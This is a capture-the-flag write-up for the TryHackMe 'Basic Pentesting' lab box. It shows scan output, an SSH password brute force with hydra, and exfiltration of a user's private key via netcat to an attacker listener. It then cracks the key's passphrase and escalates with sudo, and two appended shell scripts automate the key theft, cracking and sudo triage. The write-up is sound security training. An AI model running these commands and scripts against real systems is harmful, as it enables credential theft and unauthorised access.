# TryHackMe - Basic Pentesting

> Abdullah Rizwan | 07:04 PM | 1st November, 2020

## NMAP

```
Nmap scan report for 10.10.207.136
Host is up (0.17s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13?
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http-proxy
| fingerprint-strings: 
|   ms-sql-s, oracle-tns: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 2243
|     Date: Sun, 01 Nov 2020 14:11:05 GMT
|     Connection: close
|     HTTP Status 400 – Bad Request
|_    [raw SF: service-fingerprint lines omitted: they are the HTML of a Tomcat-style "HTTP Status 400 – Bad Request" error page]
Host script results:
|_nbstat: NetBIOS name: BASIC2, NetBIOS MAC: (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2020-11-01T09:11:08-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-01T14:11:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds
```

Six services are exposed: OpenSSH 7.2p2, Apache 2.4.18 on 80, Samba 4.3.11 on 139/445, and a Tomcat-style stack on 8080 with its AJP connector on 8009. Two details in the SMB scripts matter: nmap got in with the `guest` account (`account_used: guest`), so anonymous access to the shares is worth trying, and SMB message signing is disabled / not required. Signing is the Samba default and is not what gets us in here, but it belongs in the findings.

## PORT 80

Apache serves an untitled page with nothing useful on it, so content discovery with gobuster (below) is the next step.

## PORT 8080

Port 8080 answered nmap's probes with a Tomcat-style `HTTP Status 400 – Bad Request` page, and 8009 is the matching AJP connector. Neither is needed for the path taken here.

## Smb Shares

Ports 139 and 445 are open and the scan already authenticated as `guest`, so check whether the shares can be listed and read without credentials. One share is readable anonymously and contains `staff.txt`, which gives us two usernames, `jan` and `kay`:

```
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!)
-Kay
```

## Gobuster

Running gobuster against port 80 turns up a `/development` directory. The scan was stopped as soon as it appeared (under 2% of the wordlist), so other directories may exist:

```
gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.207.136/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/01 19:18:49 Starting gobuster
===============================================================
/development (Status: 301)
Progress: 3698 / 220561 (1.68%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/01 19:20:02 Finished
===============================================================
```

`/development` holds two notes. `j.txt`:

```
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K
```

`dev.txt`:

```
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later.
-J
```

`j.txt` tells us J's password was trivially crackable. `dev.txt` names the Struts version (2.5.12) with the REST example deployed; that combination is the one affected by the Struts REST plugin deserialization bug (CVE-2017-9805, fixed in 2.5.13), so the Tomcat side is a second way onto the box, but the weak password is the quicker route.

## Hydra

`jan` is the user with the weak password and SSH is open, so brute-force it with hydra and rockyou. Hydra itself warns that SSH servers limit concurrent sessions and recommends `-t 4`; the run below kept the default of 16 tasks and was correspondingly slow, but still landed on the password:

```
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.207.136:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
[22][ssh] host: 10.10.207.136   login: jan   password: armando
```

Log in as `jan` over SSH with that password. Kay's home directory is readable, including `/home/kay/.ssh/id_rsa`; copy the private key back to the attacking machine (for example by piping it through netcat to a listener). It is passphrase-protected, so it cannot be used as-is.

Use `ssh2john` to turn the key into a hash john can crack:

```
root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa > hash_for_id_rsa
```

Then run `john hash_for_id_rsa`. With no wordlist specified, john works through its own `password.lst` and then falls back to incremental mode, which is why this took about thirteen minutes; a wordlist run (`--wordlist=/usr/share/wordlists/rockyou.txt`) is the usual first attempt.

```
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:56  3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
0g 0:00:00:57  3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
0g 0:00:00:58  3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
0g 0:00:05:23  3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
0g 0:00:05:24  3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
0g 0:00:06:36  3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
0g 0:00:07:21  3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
0g 0:00:07:22  3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
0g 0:00:09:14  3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
0g 0:00:09:15  3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
0g 0:00:09:16  3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
0g 0:00:09:17  3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
0g 0:00:09:18  3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
0g 0:00:09:19  3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
0g 0:00:12:52  3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
0g 0:00:12:53  3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
0g 0:00:12:54  3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
0g 0:00:12:55  3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
0g 0:00:12:56  3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
0g 0:00:12:57  3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
0g 0:00:12:58  3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
0g 0:00:12:59  3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
0g 0:00:13:01  3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
0g 0:00:13:02  3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
0g 0:00:13:03  3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
beeswax          (id_rsa)
```

The passphrase is `beeswax`. Log in as `kay` with the key and that passphrase, then check what sudo allows. `sudo -l` shows kay may run any command as any user:

```
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
kay@basic2:~$
```

So `sudo bash` gives a root shell. The whole chain was an anonymous SMB share leaking usernames, a guessable SSH password, a private key readable by another local user, a dictionary-word passphrase on that key, and unrestricted sudo.
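The key-handling steps above (copy `id_rsa` off the box with netcat, `ssh2john`, `john`, then log in) are where this kind of room most often goes wrong in practice: the key arrives mangled by a terminal copy-paste, or the cracked passphrase is typed into a live login instead of being checked first. The script below is an added example and not part of the original writeup. It assumes the attacker address, listener port and file names are passed as arguments, that `ssh2john.py` and `rockyou.txt` are at their stock Kali paths, and that netcat is the Debian/Kali build (which accepts `-q 0`); the digest and key-normalisation helpers are pure shell and run anywhere.

```sh
#!/bin/sh
# Added example (not from the original writeup): move kay's passphrase-protected
# id_rsa off the target, confirm it arrived byte-for-byte, recover the passphrase
# and prove it opens the key before using it. Attacker IP/port, file paths and the
# rockyou/ssh2john locations are assumptions passed in or taken from a stock Kali.
set -u

# Portable SHA-256 of a file (GNU coreutils sha256sum, else BSD/macOS shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# ON THE ATTACKER: wait for the key.  recv_key <port> <out_file>
recv_key() {
    nc -lvnp "$1" > "$2"
}

# ON THE TARGET (as jan): print the digest so it can be compared after transfer,
# then push the file. -q 0 makes Debian/Kali netcat exit at EOF (OpenBSD nc uses
# -N); without it the sender hangs.  send_key <attacker_ip> <port> <file>
send_key() {
    sha256_of "$3"
    nc -q 0 "$1" "$2" < "$3"
}

# Returns 0 when the received copy matches the digest printed on the target.
# verify_transfer <expected_sha256> <file>
verify_transfer() {
    [ "$1" = "$(sha256_of "$2")" ]
}

# A key pasted through a terminal often picks up CR characters or loses its final
# newline, and ssh then rejects it with "invalid format". Rewrite to plain LF,
# restore the trailing newline and set the 0600 mode ssh insists on.
normalize_key() {
    tr -d '\r' < "$1" > "$1.tmp" && mv "$1.tmp" "$1"
    if [ -n "$(tail -c 1 "$1")" ]; then printf '\n' >> "$1"; fi
    chmod 600 "$1"
}

# ssh2john converts the encrypted key into a john hash; a rockyou run is the usual
# first attempt before falling back to incremental mode.  crack_passphrase <key_file>
crack_passphrase() {
    python3 /usr/share/john/ssh2john.py "$1" > "$1.hash"
    john --wordlist=/usr/share/wordlists/rockyou.txt "$1.hash" >/dev/null 2>&1 || true
    john --show "$1.hash" | head -n 1 | cut -d: -f2
}

# Check the passphrase offline by deriving the public key; no login attempt, so no
# auth.log noise if it is wrong.  passphrase_ok <key_file> <passphrase>
passphrase_ok() {
    ssh-keygen -y -P "$2" -f "$1" >/dev/null 2>&1
}

# login_with_key <key_file> <user> <host>
login_with_key() {
    ssh -i "$1" -o IdentitiesOnly=yes "$2@$3"
}

case "${1:-}" in
    recv)  recv_key "$2" "$3" ;;
    send)  send_key "$2" "$3" "$4" ;;
    crack) normalize_key "$2"
           pass=$(crack_passphrase "$2")
           passphrase_ok "$2" "$pass" && echo "passphrase: $pass" ;;
    login) login_with_key "$2" "$3" "$4" ;;
    *)     ;;
esac
```

Typical order: `sh keys.sh recv 4444 id_rsa` on the attacker, `sh keys.sh send <attacker_ip> 4444 /home/kay/.ssh/id_rsa` on the target (note the digest it prints), `verify_transfer <digest> id_rsa`, then `sh keys.sh crack id_rsa` and `sh keys.sh login id_rsa kay 10.10.207.136`.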
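The last step reads `sudo -l` by eye and jumps to `sudo bash`. That is correct for `(ALL : ALL) ALL`, but on boxes where the rule is narrower the same glance misses a single binary that is just as good as root. The script below is an added example, not part of the original writeup: it classifies `sudo -l` output over a constructed sample in the exact format sudo prints. Only the first rule in the sample is the one actually found on basic2; the other two rules, and the list of shell-capable binaries, are illustrative assumptions.

```sh
#!/bin/sh
# Added example (not from the original writeup): triage `sudo -l` output so an
# unrestricted rule is recognised immediately and narrower rules are not mistaken
# for safe ones. The sample is constructed; only "(ALL : ALL) ALL" is from the box.
set -u

SAMPLE_SUDO_L='Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/vim
    (www-data) /usr/bin/cat /var/log/apache2/access.log'

# Reads `sudo -l` text on stdin and prints "<class> <rule>" for each rule line:
#   full   - ALL as any user: `sudo bash` / `sudo -i` is root immediately
#   shell  - a single binary that can spawn a shell or read/write arbitrary files
#            (an illustrative subset of the usual suspects, not a complete list)
#   scoped - a constrained command; review the binary and its arguments by hand
# Comma-separated multi-command lines are classified as one unit; split them first.
triage_sudo_rules() {
    sed -n '/may run the following commands/,$p' \
    | grep -E '^[[:space:]]*\(' \
    | sed 's/^[[:space:]]*//' \
    | while IFS= read -r rule; do
        # drop the "(runas_user : runas_group) " prefix and an optional NOPASSWD tag
        cmd=$(printf '%s\n' "$rule" | sed 's/^([^)]*) //; s/^NOPASSWD: //')
        case "$cmd" in
            ALL) echo "full $rule" ;;
            */vim|*/vi|*/less|*/more|*/find|*/awk|*/python|*/python3|*/perl|*/bash|*/sh)
                echo "shell $rule" ;;
            *) echo "scoped $rule" ;;
        esac
    done
}

# Returns 0 when at least one unrestricted rule exists (the writeup's case).
has_full_sudo() {
    triage_sudo_rules | grep -q '^full '
}

# Live use on a foothold: classify the current user's rules and print the next step.
check_current_user() {
    rules=$(sudo -l)
    printf '%s\n' "$rules" | triage_sudo_rules
    if printf '%s\n' "$rules" | has_full_sudo; then
        echo "next: sudo bash   (or sudo -i)"
    fi
}
```

On the sample, `printf '%s\n' "$SAMPLE_SUDO_L" | triage_sudo_rules` prints three lines: the `(ALL : ALL) ALL` rule as `full`, the vim rule as `shell` (vim's `:!sh` is as good as `ALL`), and the `cat` of one log file as `scoped`.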